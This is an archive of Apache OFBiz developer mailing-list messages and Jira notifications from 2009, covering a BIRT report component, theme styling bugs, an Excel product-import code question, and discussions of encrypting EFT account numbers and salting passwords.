[jira] Commented: (OFBIZ-2347) BIRT Component
[ https://issues.apache.org/jira/browse/OFBIZ-2347?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707756#action_12707756 ] Chatree Srichart commented on OFBIZ-2347: - I'm sorry chris snow, I post not enough information. I had tried with birt-runtime version 2.3.1. You can change it and try again. > BIRT Component > -- > > Key: OFBIZ-2347 > URL: https://issues.apache.org/jira/browse/OFBIZ-2347 > Project: OFBiz > Issue Type: New Feature >Affects Versions: SVN trunk > Environment: software >Reporter: Chatree Srichart > Fix For: SVN trunk > > Attachments: birt.zip > > > I have component for use Eclipse BIRT as report builder. > Features: > 1. BIRT View Handler > 2. BIRT Email Service > I hope contributers contribute it to trunk. > INSTALLATION > 1. download birt.zip from attachment file > 2. extract birt.zip > 3. copy birt folder to hot-deploy folder > 4. download Eclipse BIRT runtime from > http://download.eclipse.org/birt/downloads/ > 5. extract birt-runtime-x_x_x.zip > 6. copy all jar file from birt-runtime-x_x_x/ReportEngine/lib folder to > hot-deploy/birt/lib folder > 7. change birt.engine.home property in hot-deploy/birt/config/birt.properties > to your ReportEngine path in birt-runtime_x_x_x folder > 8. add birt-container in ofbiz-container.xml file after beanshell-container > container like this > class="org.ofbiz.birt.container.BirtContainer"> > > > > > 9. compile birt component > 10. start ofbiz -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
Impoting product data from excel sheet ..
Hi All
I want to import the product related data from excel sheet. I did it but i
have one problem in this.
I excel sheet i have absolute path of image now i want to upload the image
from that absolute path to our application as well store the relative path
in data base as we did in product content section.
i am able to store the relative path in database but image in not uploading
in the required folder.
Main problem is that here i am not using any html form.
i paste the code below for it
public static String uploadCategory(HttpServletRequest request,
HttpServletResponse response) {
try
{
String filename = "D:/category.xls";
WorkbookSettings ws = new WorkbookSettings();
ws.setLocale(new Locale("en", "EN"));
Workbook workbook = Workbook.getWorkbook(new File(filename),ws);
Sheet s = workbook.getSheet(0);
readCategoryDataSheet(s, request);
workbook.close();
}
catch (IOException e)
{
e.printStackTrace();
}
catch (BiffException e)
{
e.printStackTrace();
}
return "success";
}
private static void readCategoryDataSheet(Sheet s, HttpServletRequest
request)
{
Cell rowData[] = null;
int successCount = 0;
int failCount = 0;
int rows = s.getRows();
int column = s.getColumns();
String productCategoryId = "";
String productCategoryTypeId = "";
String primaryParentCategoryId = "";
String categoryName = "";
String description = "";
String longDescription = "";
String categoryImageUrl = "";
String linkOneImageUrl = "";
String prodCatalogId = "";
String prodCatalogCategoryTypeId = "";
String sequenceNum = "";
for (int i = 1; i < rows; i++) {
rowData = s.getRow(i);
if (rowData[0].getContents().length() != 0) {
for (int j = 0; j < column; j++) {
switch (j) {
case 0:
productCategoryId =
rowData[j].getContents();
case 1:
productCategoryTypeId =
rowData[j].getContents();
case 2:
primaryParentCategoryId =
rowData[j].getContents();
case 3:
categoryName =
rowData[j].getContents();
case 4:
description =
rowData[j].getContents();
case 5:
longDescription =
rowData[j].getContents();
case 6:
categoryImageUrl =
rowData[j].getContents();
case 7:
linkOneImageUrl =
rowData[j].getContents();
default:
break;
}
}
}
String imageFilenameFormat =
UtilProperties.getPropertyValue("catalog",
"image.filename.format");
String imageServerPath =
UtilProperties.getPropertyValue("catalog",
"image.server.path");
String imageUrlPrefix =
UtilProperties.getPropertyValue("catalog",
"image.url.prefix");
// upload image
FlexibleStringExpander filenameExpander = new
FlexibleStringExpander(imageFilenameFormat);
String catImageUrl = "";
String linkImageUrl = "";
if(categoryImageUrl != null &&
categoryImageUrl.length() > 0){
Object forLock = new Object();
String contentType = null;
String categoryImageLocation =
filenameExpander.expandString(UtilMisc.toMap("location", "categories",
"type", "category", "id", productCategoryId));
String filePathPrefix = "";
String filenameToUse = categoryImageLocation;
if (categoryImageLocation.lastIndexOf("/") != -1) {
filePathPrefix =
categoryImageLocation.substring(0,
categoryImageLocation.lastIndexOf("/") + 1); // adding 1 to include the
trailing slash
filenameToUse =
categoryImageLocation.substring(categoryImage
[jira] Commented: (OFBIZ-2453) input field shown too long
[ https://issues.apache.org/jira/browse/OFBIZ-2453?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707739#action_12707739 ] Hans Bakker commented on OFBIZ-2453: perhaps Jacopo can have a look at this now with the new freemarker macro renderer? (i hear he is sick now but will be soon better i hope...) > input field shown too long > -- > > Key: OFBIZ-2453 > URL: https://issues.apache.org/jira/browse/OFBIZ-2453 > Project: OFBiz > Issue Type: Sub-task >Affects Versions: Release Branch 9.04 >Reporter: Hans Bakker > > If in a widget form i define an input text field and as length 2 characters, > the field shown is much longer and is shown much more characters and taking > up too much screen space. > The main problem is shown on the weekly timesheet where there are a lot of > input fields. (myportal -> timesheet) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Commented: (OFBIZ-2453) input field shown too long
[ https://issues.apache.org/jira/browse/OFBIZ-2453?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707738#action_12707738 ] BJ Freeman commented on OFBIZ-2453: --- belive this is related had this converstation last year https://issues.apache.org/jira/browse/OFBIZ-2021 > input field shown too long > -- > > Key: OFBIZ-2453 > URL: https://issues.apache.org/jira/browse/OFBIZ-2453 > Project: OFBiz > Issue Type: Sub-task >Affects Versions: Release Branch 9.04 >Reporter: Hans Bakker > > If in a widget form i define an input text field and as length 2 characters, > the field shown is much longer and is shown much more characters and taking > up too much screen space. > The main problem is shown on the weekly timesheet where there are a lot of > input fields. (myportal -> timesheet) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Created: (OFBIZ-2453) input field shown too long
input field shown too long -- Key: OFBIZ-2453 URL: https://issues.apache.org/jira/browse/OFBIZ-2453 Project: OFBiz Issue Type: Sub-task Affects Versions: Release Branch 9.04 Reporter: Hans Bakker If in a widget form i define an input text field and as length 2 characters, the field shown is much longer and is shown much more characters and taking up too much screen space. The main problem is shown on the weekly timesheet where there are a lot of input fields. (myportal -> timesheet) -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Commented: (OFBIZ-2379) Encrypt EFT Account number
[ https://issues.apache.org/jira/browse/OFBIZ-2379?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707728#action_12707728 ] Hans Bakker commented on OFBIZ-2379: i do not agree with this. In general, bank accounts numbers are public and there is no need to encrypt them. Mostly this number is printed on an invoice sent to a customer in order for him to be able to make a bank transfer. regards, Hans > Encrypt EFT Account number > -- > > Key: OFBIZ-2379 > URL: https://issues.apache.org/jira/browse/OFBIZ-2379 > Project: OFBiz > Issue Type: Improvement > Components: accounting >Affects Versions: SVN trunk >Reporter: Wickersheimer Jeremy >Assignee: Jacques Le Roux >Priority: Minor > Fix For: SVN trunk > > Attachments: 2379.patch > > > Account numbers could be encrypted just like credit card numbers. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
Re: Field max size based on DB field info
see https://issues.apache.org/jira/browse/OFBIZ-2021 also Jacques Le Roux sent the following on 5/9/2009 2:56 PM: > It seems that nothing happenned (no answers, etc.) after this message, > please why ? > > Thanks > > Jacques > > From: "BJ Freeman" >> Up till now I assumed the DB field info was fed back into the entities >> when field size as defined. >> questions: >> Does doing this break any models or design goals? >> Is there a reason this DB field info is not used in the >> ModelFormField.java >> > > -- BJ Freeman http://www.businessesnetwork.com/automation http://bjfreeman.elance.com http://www.linkedin.com/profile?viewProfile=&key=1237480&locale=en_US&trk=tab_pro Systems Integrator.
[jira] Closed: (OFBIZ-2161) Extending the capability of configurable product in OFBiz with Freature tree generation technique
[ https://issues.apache.org/jira/browse/OFBIZ-2161?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux closed OFBIZ-2161. -- Resolution: Fixed Fix Version/s: SVN trunk Assignee: Jacques Le Roux Seems that nobody is interested to bring this further... > Extending the capability of configurable product in OFBiz with Freature tree > generation technique > - > > Key: OFBIZ-2161 > URL: https://issues.apache.org/jira/browse/OFBIZ-2161 > Project: OFBiz > Issue Type: Improvement > Components: order >Affects Versions: SVN trunk >Reporter: Amit Sharma >Assignee: Jacques Le Roux > Fix For: SVN trunk > > Attachments: DemoConfigurator.patch, > Image_After_Applying_Patch_and_using_Feature_tree.png, > Image_By_Using_Feature_Tree.png, Image_By_Using_Variant_Tree.png, > inlineProductDetail.patch, Pizza tree 2 issues.jpg, Screenshot.png > > > In ecommerce application we can't add more than one virtual products using > feature tree generation as a component in configurable product. > Such as if we take example of Pizza which is a configurable product and > Peepers and sauce are its virtual product . > If we use feature tree generation in these inline products then its not > working fine for virtual products (Sauce). -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2316) Replace the footer in BizznessTime theme
[ https://issues.apache.org/jira/browse/OFBIZ-2316?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-2316: --- Issue Type: Sub-task (was: Bug) Parent: OFBIZ-2398 > Replace the footer in BizznessTime theme > - > > Key: OFBIZ-2316 > URL: https://issues.apache.org/jira/browse/OFBIZ-2316 > Project: OFBiz > Issue Type: Sub-task > Components: ALL COMPONENTS >Affects Versions: Release Branch 9.04, SVN trunk >Reporter: Jacques Le Roux >Priority: Trivial > Fix For: Release Branch 9.04, SVN trunk > > Attachments: screenshot-1.jpg > > > ON dev ML, my request was > Actually the things that IMO are missing are > * The ASF copyright and link to a apache.org site > * Powered by OFBiz and link to ofbiz.apache.org > * Release.revision informations > Here is Ryan Foster's proposition > The originally thinking was to give the backend look and feel a more > "desktop" like feeling, where most of the information and navigation is > located in sidebars, file menus, tabs, etc. Following that line of thinking, > maybe we put a "help" link in the header right next to preferences that drops > down in a similar fashion to show copyright, link to apache, etc. This would > function exactly the same way that the help link functions in apps like > Firefox, Mac Mail, Outlook, Word, etc. We could even put a simple keyword > search field in this section that searches docs.ofbiz.org. See the attached > screenshot for an example. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Closed: (OFBIZ-2309) BizznessTime theme style issues and enhancements
[ https://issues.apache.org/jira/browse/OFBIZ-2309?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux closed OFBIZ-2309. -- Resolution: Fixed Assignee: Jacques Le Roux > BizznessTime theme style issues and enhancements > > > Key: OFBIZ-2309 > URL: https://issues.apache.org/jira/browse/OFBIZ-2309 > Project: OFBiz > Issue Type: Task > Components: ALL COMPONENTS >Affects Versions: Release Branch 9.04, SVN trunk >Reporter: Jacques Le Roux >Assignee: Jacques Le Roux > Fix For: Release Branch 9.04, SVN trunk > > > This task only to group all issues and enhancements relate to BizznessTime > theme -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2316) Replace the footer in BizznessTime theme
[ https://issues.apache.org/jira/browse/OFBIZ-2316?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-2316: --- Issue Type: Bug (was: Sub-task) Parent: (was: OFBIZ-2309) > Replace the footer in BizznessTime theme > - > > Key: OFBIZ-2316 > URL: https://issues.apache.org/jira/browse/OFBIZ-2316 > Project: OFBiz > Issue Type: Bug > Components: ALL COMPONENTS >Affects Versions: Release Branch 9.04, SVN trunk >Reporter: Jacques Le Roux >Priority: Trivial > Fix For: Release Branch 9.04, SVN trunk > > Attachments: screenshot-1.jpg > > > ON dev ML, my request was > Actually the things that IMO are missing are > * The ASF copyright and link to a apache.org site > * Powered by OFBiz and link to ofbiz.apache.org > * Release.revision informations > Here is Ryan Foster's proposition > The originally thinking was to give the backend look and feel a more > "desktop" like feeling, where most of the information and navigation is > located in sidebars, file menus, tabs, etc. Following that line of thinking, > maybe we put a "help" link in the header right next to preferences that drops > down in a similar fashion to show copyright, link to apache, etc. This would > function exactly the same way that the help link functions in apps like > Firefox, Mac Mail, Outlook, Word, etc. We could even put a simple keyword > search field in this section that searches docs.ofbiz.org. See the attached > screenshot for an example. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2308) BizznessTime theme : Business Area enhancement
[ https://issues.apache.org/jira/browse/OFBIZ-2308?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-2308: --- Issue Type: Sub-task (was: Improvement) Parent: OFBIZ-2398 > BizznessTime theme : Business Area enhancement > > > Key: OFBIZ-2308 > URL: https://issues.apache.org/jira/browse/OFBIZ-2308 > Project: OFBiz > Issue Type: Sub-task > Components: ALL COMPONENTS >Affects Versions: Release Branch 9.04, SVN trunk >Reporter: Jacques Le Roux > Fix For: Release Branch 9.04, SVN trunk > > > We could have a title for each column of Business Area. Something like "Main > applications" "Secondary applications", maybe 2 colors also ? -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
Re: Field max size based on DB field info
It seems that nothing happenned (no answers, etc.) after this message, please why ? Thanks Jacques From: "BJ Freeman" Up till now I assumed the DB field info was fed back into the entities when field size as defined. questions: Does doing this break any models or design goals? Is there a reason this DB field info is not used in the ModelFormField.java
Keep [jira] threads safe
Hi, I would like to ask developers to not "redirect" [jira] thread to dev ML. I know it's sent to dev ML anyway, and I'm sure my demand will not concern persons who are using the same recipient for both. Personnally, I'm using 2 different recipients to facilitate my researches, organisation and work. And I found this most annoying since sometimes I don't know where to search for something I saw and I'm interested in. This would be as simple as simply use Jira comments to keep things focused, centralised in one point and separated. If you really want (prefer) to "redirect" a [jira] thread to the dev ML, then please remove the [jira] prefix. Maybe this is annoying for persons who are using titles to sort and search ? Thanks Jacques
Re: [jira] Commented: (OFBIZ-2312) Styling flaws in smoothfeather
Hi Adrian, Could you give me more clues please ? Thanks Jacques From: "Adrian Crum" I fixed a similar issue in the Bluelight theme. Check the commit logs. -Adrian --- On Sun, 5/3/09, Jacques Le Roux (JIRA) wrote: From: Jacques Le Roux (JIRA) Subject: [jira] Commented: (OFBIZ-2312) Styling flaws in smoothfeather To: dev@ofbiz.apache.org Date: Sunday, May 3, 2009, 11:38 AM [ https://issues.apache.org/jira/browse/OFBIZ-2312?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12705432#action_12705432 ] Jacques Le Roux commented on OFBIZ-2312: I made BizznessTime theme the default theme (in r771074 and of course trunk only). But I have just found an annoying, but not blocking issue : in you are logged of you can't login to webtools directly. The "For something interesting make sure you are logged in, try username: admin, password: ofbiz." page show up but there are no means to login. For the moment, tt's easy to go back and use another component to log. > Styling flaws in smoothfeather > -- > > Key: OFBIZ-2312 > URL: https://issues.apache.org/jira/browse/OFBIZ-2312 > Project: OFBiz > Issue Type: Sub-task >Affects Versions: SVN trunk > Environment: XP FF3 >Reporter: Jacques Le Roux > Fix For: SVN trunk > > > I was to create an issue for each styling flaws in smoothfeather, but it's far too mcuh work. So I have created only one issue to list what we find. > We can create a numbered comment for each issue to separate them and refer easily to them whe fixed. Here we go > I wondered how to "close" (sub-)issues here. I thought about removing comments but editing the original comment and using -understrike- with a notice should be far better. You get -understrike- using \-understrike\- > If someone feels that the sub-issues here should be splitted in standard sub-tasks of OFBIZ-2309 (or even better of the current issue), please feel free to do so -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2298) Issue with the BizznessTime theme in OFBiz documentation (Confluence)
[ https://issues.apache.org/jira/browse/OFBIZ-2298?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-2298: --- Summary: Issue with the BizznessTime theme in OFBiz documentation (Confluence) (was: Issue with the new smoothfeather look in OFBiz documentation (Confluence)) > Issue with the BizznessTime theme in OFBiz documentation (Confluence) > - > > Key: OFBIZ-2298 > URL: https://issues.apache.org/jira/browse/OFBIZ-2298 > Project: OFBiz > Issue Type: Sub-task > Environment: NA >Reporter: Jacques Le Roux >Assignee: Tim Ruppert > > The styles associate with > * > and > ** > are not rendering bullets now. Could it be possible to differentiate simple > indentation with bullet (numbering is working well) ? -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2338) Main task for issues with the BizznessTime theme in OFBiz documentation (Confluence)
[ https://issues.apache.org/jira/browse/OFBIZ-2338?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-2338: --- Summary: Main task for issues with the BizznessTime theme in OFBiz documentation (Confluence) (was: Main task for issues with the new smoothfeather look in OFBiz documentation (Confluence)) > Main task for issues with the BizznessTime theme in OFBiz documentation > (Confluence) > > > Key: OFBIZ-2338 > URL: https://issues.apache.org/jira/browse/OFBIZ-2338 > Project: OFBiz > Issue Type: Task >Reporter: Jacques Le Roux > > The idea is to create a new subtask for each issue reported. This to avoid > ending with a mess since a sole issue should not be used for several issues. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2298) Issue with the new smoothfeather look in OFBiz documentation (Confluence)
[ https://issues.apache.org/jira/browse/OFBIZ-2298?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-2298: --- Issue Type: Sub-task (was: Improvement) Parent: OFBIZ-2338 > Issue with the new smoothfeather look in OFBiz documentation (Confluence) > - > > Key: OFBIZ-2298 > URL: https://issues.apache.org/jira/browse/OFBIZ-2298 > Project: OFBiz > Issue Type: Sub-task > Environment: NA >Reporter: Jacques Le Roux >Assignee: Tim Ruppert > > The styles associate with > * > and > ** > are not rendering bullets now. Could it be possible to differentiate simple > indentation with bullet (numbering is working well) ? -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Commented: (OFBIZ-2180) when creatin customer order line should be possible to enter the sales price manually.
[ https://issues.apache.org/jira/browse/OFBIZ-2180?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707712#action_12707712 ] Jacques Le Roux commented on OFBIZ-2180: Seems that the issue reported by me just above is fixed > when creatin customer order line should be possible to enter the sales price > manually. > -- > > Key: OFBIZ-2180 > URL: https://issues.apache.org/jira/browse/OFBIZ-2180 > Project: OFBiz > Issue Type: Improvement > Components: order >Affects Versions: SVN trunk >Reporter: akr has > Fix For: SVN trunk > > > It is not practical not to have the possibility to enter sales price manualy > wnen entering customer order line. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2362) Total order of a party.
[ https://issues.apache.org/jira/browse/OFBIZ-2362?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-2362: --- Issue Type: Sub-task (was: Bug) Parent: OFBIZ-2330 > Total order of a party. > --- > > Key: OFBIZ-2362 > URL: https://issues.apache.org/jira/browse/OFBIZ-2362 > Project: OFBiz > Issue Type: Sub-task > Components: order, party >Affects Versions: Release Branch 9.04 > Environment: xp >Reporter: Debraj Mallick > Fix For: Release Branch 9.04 > > Original Estimate: 1h > Remaining Estimate: 1h > > Partymgr-Find Paty(s) - Search Results porsion ,when press Order Button in a > party,generate bug ,but the party have a order. same bug generate in party > profile sections when press order button. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Commented: (OFBIZ-2379) Encrypt EFT Account number
[ https://issues.apache.org/jira/browse/OFBIZ-2379?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707711#action_12707711 ] Jacques Le Roux commented on OFBIZ-2379: I will commit this change if nobody see a problem with that (someone needing acountnumber not encrypted for instance ?) > Encrypt EFT Account number > -- > > Key: OFBIZ-2379 > URL: https://issues.apache.org/jira/browse/OFBIZ-2379 > Project: OFBiz > Issue Type: Improvement > Components: accounting >Affects Versions: SVN trunk >Reporter: Wickersheimer Jeremy >Assignee: Jacques Le Roux >Priority: Minor > Fix For: SVN trunk > > Attachments: 2379.patch > > > Account numbers could be encrypted just like credit card numbers. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2394) Items block spreaded vertically on Invoice Summary View
[ https://issues.apache.org/jira/browse/OFBIZ-2394?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-2394: --- Issue Type: Sub-task (was: Bug) Parent: OFBIZ-2451 > Items block spreaded vertically on Invoice Summary View > --- > > Key: OFBIZ-2394 > URL: https://issues.apache.org/jira/browse/OFBIZ-2394 > Project: OFBiz > Issue Type: Sub-task > Components: accounting >Affects Versions: SVN trunk >Reporter: Ashish Vijaywargiya >Priority: Minor > Fix For: SVN trunk > > Attachments: Items_Block_Looks.png > > > Please have a look on the attached image for reference. > Will see this problem shortly. > -- > Ashish -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Assigned: (OFBIZ-2379) Encrypt EFT Account number
[ https://issues.apache.org/jira/browse/OFBIZ-2379?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux reassigned OFBIZ-2379: -- Assignee: Jacques Le Roux > Encrypt EFT Account number > -- > > Key: OFBIZ-2379 > URL: https://issues.apache.org/jira/browse/OFBIZ-2379 > Project: OFBiz > Issue Type: Improvement > Components: accounting >Affects Versions: SVN trunk >Reporter: Wickersheimer Jeremy >Assignee: Jacques Le Roux >Priority: Minor > Fix For: SVN trunk > > Attachments: 2379.patch > > > Account numbers could be encrypted just like credit card numbers. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Commented: (OFBIZ-2452) Security error in Catalog. Trying to delete
[ https://issues.apache.org/jira/browse/OFBIZ-2452?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707710#action_12707710 ] BJ Freeman commented on OFBIZ-2452: --- I know this has been discussed on the dev list. I would love to provide patches. I am guessing this has to be changed to a post, if I understand right. it seems most of the delete button in catalog section come up with similar messages. https://localhost:8443/catalog/control/promo_deleteProductStorePromoAppl?productStoreId=TestStore&productPromoId=9019&fromDate=2009-04-27%2015:11:56.0 Error calling event: org.ofbiz.webapp.event.EventHandlerException: Found URL parameter [productStoreId] passed to secure (https) request-map with uri [promo_deleteProductStorePromoAppl] with an event that calls service [deleteProductStorePromoAppl]; this is not allowed for security reasons! The data should be encrypted by making it part of the request body (a form field) instead of the request URL. > Security error in Catalog. Trying to delete > --- > > Key: OFBIZ-2452 > URL: https://issues.apache.org/jira/browse/OFBIZ-2452 > Project: OFBiz > Issue Type: Sub-task >Reporter: BJ Freeman > -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Created: (OFBIZ-2452) Security error in Catalog. Trying to delete
Security error in Catalog. Trying to delete --- Key: OFBIZ-2452 URL: https://issues.apache.org/jira/browse/OFBIZ-2452 Project: OFBiz Issue Type: Sub-task Reporter: BJ Freeman -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2368) styling flaws in BlueLight Theme: Breadcrumbs, drop-down menus and rounded corners
[ https://issues.apache.org/jira/browse/OFBIZ-2368?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-2368: --- Issue Type: Sub-task (was: Bug) Parent: OFBIZ-2451 > styling flaws in BlueLight Theme: Breadcrumbs, drop-down menus and rounded > corners > -- > > Key: OFBIZ-2368 > URL: https://issues.apache.org/jira/browse/OFBIZ-2368 > Project: OFBiz > Issue Type: Sub-task > Components: ALL COMPONENTS >Affects Versions: Release Branch 9.04, SVN trunk >Reporter: BJ Freeman >Priority: Minor > Fix For: Release Branch 9.04, SVN trunk > > > I saw the one for smooth feather so open one for this style > I ran accros the same back button issue as in the #6 on smooth feather. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Created: (OFBIZ-2451) Styling flaws in BlueLight Theme
Styling flaws in BlueLight Theme Key: OFBIZ-2451 URL: https://issues.apache.org/jira/browse/OFBIZ-2451 Project: OFBiz Issue Type: Improvement Components: ALL COMPONENTS Affects Versions: Release Branch 9.04, SVN trunk Reporter: Jacques Le Roux Fix For: Release Branch 9.04, SVN trunk Main task -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Closed: (OFBIZ-1972) New email page, needs a link to create a Primarry email address non is in the list fror the to and from selections.
[ https://issues.apache.org/jira/browse/OFBIZ-1972?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] BJ Freeman closed OFBIZ-1972. - Resolution: Fixed since there is no more mypage and lot of work has been done, just close for now. will open a new one if I find the same with my portal. > New email page, needs a link to create a Primarry email address non is in the > list fror the to and from selections. > --- > > Key: OFBIZ-1972 > URL: https://issues.apache.org/jira/browse/OFBIZ-1972 > Project: OFBiz > Issue Type: Bug > Components: specialpurpose/myportal >Affects Versions: SVN trunk > Environment: currenet SVN >Reporter: BJ Freeman > Fix For: SVN trunk > > > if a party does not have a primary email address in the contact mechs > https://localhost:8443/mypage/control/EditCommunicationEvent?communicationEventTypeId=EMAIL_COMMUNICATION&donePage=main > there is no indication why there is nothing in the from dropdown. it is null. > Suggest showing a link next to the dropdown to > https://localhost:8443/partymgr/control/editcontactmech?partyId=the logged in > party > and it the URL can be more specific have the Contact Type be already selected > to Email address. > and for the PartyEmailTo have the look up show all parties but the ones with > out a primary address have a link in the Email address to add one. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Commented: (OFBIZ-1151) Passwords are not seeded
[ https://issues.apache.org/jira/browse/OFBIZ-1151?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707707#action_12707707 ] Jacques Le Roux commented on OFBIZ-1151: Maybe we should just provide a salting mechanism with clear explanations. I mean OFBiz paswords salted OOTB but only as a demonstration and clear explanations about not only changing passwords (as it's already done for admin password) but also salt string. Maybe Michael Jensen's idea of colon separating password and salt could be used ? I also remember the idea of having a salt string only related to the password at hand (to avoid easy hack if the salt is discovered by a way or another...), this is also called random salt (the alternative being static salt). But obviously this introduces a new breach has you have to store also the random salt. Except if you use a part of the record only *you*know (for instance a part of the creation date field, etc.) My 2cts Jacques > Passwords are not seeded > > > Key: OFBIZ-1151 > URL: https://issues.apache.org/jira/browse/OFBIZ-1151 > Project: OFBiz > Issue Type: Sub-task > Components: party >Affects Versions: Release Branch 4.0, SVN trunk >Reporter: Wickersheimer Jeremy >Assignee: Jacques Le Roux >Priority: Minor > > Password are currently hashed but not seeded which may be a security issue. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
Re: svn commit: r772941 - in /ofbiz/trunk: framework/common/webcommon/includes/fo/ framework/webtools/webapp/webtools/entity/ specialpurpose/ecommerce/webapp/ecommerce/includes/ specialpurpose/webpos/
BJ,
Yes I saw your change when I merged So, this file has 2009 in it.
http://svn.apache.org/viewvc?rev=772914&view=rev
And now no OFBiz proper files has still 2008 in it but LICENCE and NOTICE which I'm working on because of the future Axis2 component
integration...
So I'm not sure what you want to do with the 2 others ;o)
Thanks
Jacques
From: "BJ Freeman"
the jira for ModelInduceFromDb.jsp already has it in it
if you want I can do the other two and include them in the same jira
https://issues.apache.org/jira/browse/OFBIZ-2432
Jacques Le Roux sent the following on 5/9/2009 5:38 AM:
I have finally reverted r772941 at r773211
To be consistent, I have replaced 2009 by ${nowTimestamp?string("")}
in specialpurpose/cmssite/template/ofbiz/ofbizFooter.ftl at r773216
If someone is interested, I did not take the time to think about
ModelInfo.java
ModelWriter.jsp
ModelInduceFromDb.jsp
Jacques
From: "Jacques Le Roux"
I had a look, in US seems to be 95 or 120 years in our case <>
What is less clear to me is if a release is a publication and if
creation is begining with Undersun or Apache Era (I guess Apache
Era)... Moreover things are not the same in EU, etc.
Headache :/
I think you are right David. We should simplify our work and use
automatic date copyright generation for all artifacts generated.
If someone has a better understanding of all these things please chime
in, I give up!
Jacques
From: "Jacques Le Roux"
From: "David E Jones"
Yes, we do need an end date (or not start date). Copyright
protection has a limited time period, I believe something like 10
years for things like this. Because of that copyright holders have
an incentive to update the copyright date as they release
new editions.
In EU seems to be 70 years (IANAL), anyway I understand why people
update the copyright now. But are we sure that a new edition
allows to break the 10-70 years ?
Again, please keep in mind the difference between a copyright
message for a specific file in the project, and a copyright
message that represents that output generated by the system (which
copyright is typically customized when the system is
deployed, BTW).
I see the difference, but is this legal ? What does it means ? If
OFBiz is still used in 2100 but not updated since 2050, this
means that the generated outputs are still protected but not the
software itself !?
The files changed here are for the copyright statements which cover
generated output, so the substantial change issue is
satisfied, and in fact it has nothing to do with it because each
page generated is a unique work and not tied to a previous
page.
Are you sure we legally able to differentiate the work (OFBiz) and
its generated outputs ?
In the headers for each file in the project what really should
happen is that people update the copyright date when they make
substantial changes to each file. Trying to remember that and keep
track of it is not terribly likely and is a real pain as
another thing on top of dozens already for people to remember.
I have already forgotten, what were you speaking about ? ;p
The best solution for those headers (which again has nothing to do
with this particular commit) is probably to do a review once
a year of all files with more than X lines (probably 5-10) of
changes, and then update the headers on those (if they haven't
already been updated).
Yes sounds like a good policy
Jacques
-David
On May 8, 2009, at 9:49 AM, Jacques Le Roux wrote:
Also I (we?) have not checked this rule
http://www.law.cornell.edu/treaties/berne/overview.html . I just
tried but did not find
anything obvious...
Some links
http://itlaw.wikia.com/wiki/Copyright_duration
http://en.wikipedia.org/wiki/Copyright#Duration
http://en.wikipedia.org/wiki/Directive_on_harmonising_the_term_of_copyright_protection#Duration_of_protection
Finally I wonder now if we really need to put and end date there...!
Maybe David Goodenough can enlighten us ?
Jacques
From: "David E Jones"
